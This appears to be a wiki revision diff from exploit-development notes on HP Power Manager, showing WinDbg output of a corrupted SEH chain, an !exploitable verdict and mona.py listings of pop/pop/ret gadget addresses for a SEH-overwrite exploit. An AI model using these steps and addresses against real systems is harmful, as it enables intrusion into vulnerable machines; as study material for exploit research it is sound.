exploiting:windows:hppowerman
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| exploiting:windows:hppowerman [2019/05/07 15:37] – ebaer | exploiting:windows:hppowerman [2019/05/07 15:48] (current) – ebaer | ||
|---|---|---|---|
| Line 495: | Line 495: | ||
| 0018f87c | 0018f87c | ||
| </ | </ | ||
| + | |||
| + | |||
| + | < | ||
| + | 0:000> !exchain | ||
| + | 0018f80c: 41414141 | ||
| + | Invalid exception stack at 41414141 | ||
| + | |||
| + | </ | ||
| + | |||
| + | ===== Exploitable? | ||
| + | |||
| + | < | ||
| + | 0:005> .load msec | ||
| + | 0:005> !exploitable | ||
| + | |||
| + | !exploitable 1.6.0.0 | ||
| + | *** WARNING: Unable to verify checksum for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe | ||
| + | *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\HP\Power Manager\DevManBE.exe | ||
| + | Exploitability Classification: | ||
| + | Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at msvcrt!_get_printf_count_output+0x000000000000002e (Hash=0x65c12afd.0x93798406) | ||
| + | |||
| + | Corruption of the exception handler chain is considered exploitable | ||
| + | |||
| + | </ | ||
| + | |||
| ===== Step ===== | ===== Step ===== | ||
| Line 518: | Line 543: | ||
| </ | </ | ||
| + | |||
| + | |||
| + | ====== SafeSEH exploit ====== | ||
| + | |||
| + | < | ||
| + | 0:005> .load pykd.pyd | ||
| + | 0:005> !py mona seh | ||
| + | Hold on... | ||
| + | [+] Command used: | ||
| + | !py mona.py seh | ||
| + | |||
| + | ---------- Mona command started on 2019-05-07 06:48:06 (v2.0, rev 585) ---------- | ||
| + | [+] Processing arguments and criteria | ||
| + | - Pointer access level : X | ||
| + | [+] Generating module info table, hang on... | ||
| + | - Processing modules | ||
| + | - Done. Let's rock 'n roll. | ||
| + | [+] Querying 3 modules | ||
| + | - Querying module MSVCP60.dll | ||
| + | - Querying module DevManBE.exe | ||
| + | - Querying module DCL.dll | ||
| + | [+] Setting pointer access level criteria to ' | ||
| + | New pointer access level : R | ||
| + | [+] Preparing output file ' | ||
| + | - (Re)setting logfile c: | ||
| + | [+] Writing results to c: | ||
| + | - Number of pointers of type 'add esp,8 # ret 0x04' : 2 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x04' : 4 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x04' : 17 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x04' : 111 | ||
| + | - Number of pointers of type 'pop ecx # pop ecx # ret ' : 39 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x08' : 13 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x08' : 6 | ||
| + | - Number of pointers of type 'add esp,8 # ret 0x08' : 20 | ||
| + | - Number of pointers of type 'pop ecx # pop ecx # ret 0x04' : 2 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x20' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop edi # ret ' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret 0x08' : 2 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret ' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret ' : 8 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 4 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 15 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret 0x04' : 6 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop edi # pop ebp # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x10' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 12 | ||
| + | - Number of pointers of type 'pop esi # pop ecx # ret ' : 10 | ||
| + | - Number of pointers of type 'pop ebp # pop ecx # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x10' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop edi # ret 0x04' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret ' : 27 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret ' : 23 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x0c' : 8 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x0c' : 19 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret ' : 10 | ||
| + | - Number of pointers of type 'pop edi # pop ebx # ret 0x04' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop edi # ret ' : 3 | ||
| + | - Number of pointers of type 'pop edi # pop ebx # ret ' : 2 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x20' : 3 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x20' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop ebp # ret ' : 6 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret ' : 12 | ||
| + | - Number of pointers of type 'pop esi # pop ecx # ret 0x04' : 4 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x08' : 6 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop ebx # pop esi # ret ' : 1 | ||
| + | - Number of pointers of type 'add esp,8 # ret ' : 42 | ||
| + | - Number of pointers of type 'add esp,4 # pop ebp # ret ' : 7 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 5 | ||
| + | [+] Results : | ||
| + | 0x1000672b | | ||
| + | 0x1000678d | | ||
| + | 0x0047001c | | ||
| + | 0x0047f13d | | ||
| + | 0x10002b0a | | ||
| + | 0x10002b64 | | ||
| + | 0x7608165a | | ||
| + | 0x7608573e | | ||
| + | 0x76085758 | | ||
| + | 0x760857cf | | ||
| + | 0x760857e9 | | ||
| + | 0x76085815 | | ||
| + | 0x76085cdd | | ||
| + | 0x76097a75 | | ||
| + | 0x76097aa5 | | ||
| + | 0x76097f2f | | ||
| + | 0x76097f60 | | ||
| + | 0x00444527 | | ||
| + | 0x00476b25 | | ||
| + | 0x004820d1 | | ||
| + | ... Please wait while I'm processing all remaining results and writing everything to file... | ||
| + | [+] Done. Only the first 20 pointers are shown here. For more pointers, open c: | ||
| + | Found a total of 476 pointers | ||
| + | |||
| + | [+] This mona.py action took 0: | ||
| + | |||
| + | </ | ||
exploiting/windows/hppowerman.1557236254.txt.gz · Last modified: 2019/05/07 15:37 by ebaer
